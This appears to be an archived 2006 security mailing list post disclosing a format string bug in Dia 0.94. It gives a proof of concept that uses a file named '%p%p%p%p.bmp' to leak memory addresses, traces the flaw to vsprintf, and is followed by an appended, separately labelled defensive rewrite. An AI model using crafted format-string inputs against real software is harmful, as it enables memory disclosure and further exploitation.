Vulnerability Development: DIA file name handling format string
From: <king_purba_at_yahoo.co.uk>
Date: 6 May 2006 04:51:14 -0000
Author: KaDaL-X
http://kandangjamur.net

Software tested:
Dia v0.94 on Fedora Core 4
Dia v0.94 on Mandriva
http://www.gnome.org/projects/dia

PoC :
------
[ph03n1x_at_kaiten ~]$ touch %p%p%p%p.bmp

Now open %p%p%p%p.bmp in Dia; an error like the following will appear:

Failed to load:
Couldn't recognize the image file format for file
'0xbfec1a480xc0cf670x89608b00x9f247e.bmp'

Code analysis:
--------------
In plug-ins/pixbuf/pixbuf.c, line 152:

 else if (error) /* otherwise a pixbuf misbehaviour */
 {
      message_warning ("Failed to load:\n%s", error->message);
      g_error_free (error);
 }

Then in lib/message.c, line 220:

message_warning(const char *format, ...)
{
  va_list args, args2;

  va_start (args, format);
  va_start (args2, format);
  message_internal(_("Warning"), format, &args, &args2);
  va_end (args);
  va_end (args2);
}

In lib/message.c, line 187, message_internal is defined as:

static MessageInternal message_internal = gtk_message_internal;

Now, analysing the gtk_message_internal() function in lib/message.c, line
157, the vsprintf() function is used incorrectly:

vsprintf (buf, fmt, *args2);

Based on /usr/include/stdio.h, the second argument of vsprintf must be a
constant string.
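As an added example that is not part of the original post or of Dia's sources, here is the message_warning / message_internal chain rewritten so that the expanded text is only ever consumed as data: a bounded vsnprintf expands the constant format exactly once, and the result then passes through a literal "%s" conversion instead of being handed to a printf-family call as its format. The function names and the constructed GdkPixbuf-style error text are assumptions.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical stand-in for Dia's message_internal() (not Dia's code).
 * The caller's constant format is expanded once, with a bounded
 * vsnprintf instead of vsprintf; from then on the text is only data. */
static void safe_message_internal(char *out, size_t outlen,
                                  const char *title, const char *fmt,
                                  va_list args)
{
    char body[512];
    vsnprintf(body, sizeof body, fmt, args);
    /* body may contain attacker-chosen bytes such as "%p%p%p%p", so it
     * is passed through a "%s" conversion, never as a format string. */
    snprintf(out, outlen, "%s: %s", title, body);
}

/* Hypothetical counterpart of message_warning(): constant format plus
 * variadic arguments, matching the pixbuf.c call shown on the page. */
static void safe_message_warning(char *out, size_t outlen,
                                 const char *fmt, ...)
{
    va_list args;
    va_start(args, fmt);
    safe_message_internal(out, outlen, "Warning", fmt, args);
    va_end(args);
}

/* Replays the page's scenario with a constructed loader error message
 * that embeds the user-supplied file name. Returns 1 when the file name
 * is reproduced verbatim in the final message (no %p expansion). */
int filename_survives_verbatim(const char *filename, char *out, size_t outlen)
{
    char errmsg[256];
    /* constructed text mimicking the GdkPixbuf error quoted in the PoC */
    snprintf(errmsg, sizeof errmsg,
             "Couldn't recognize the image file format for file '%s'",
             filename);
    safe_message_warning(out, outlen, "Failed to load:\n%s", errmsg);
    return strstr(out, filename) != NULL;
}

int main(void)
{
    char out[1024];
    filename_survives_verbatim("%p%p%p%p.bmp", out, sizeof out);
    puts(out);
    return 0;
}
```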
Received on May 08 2006
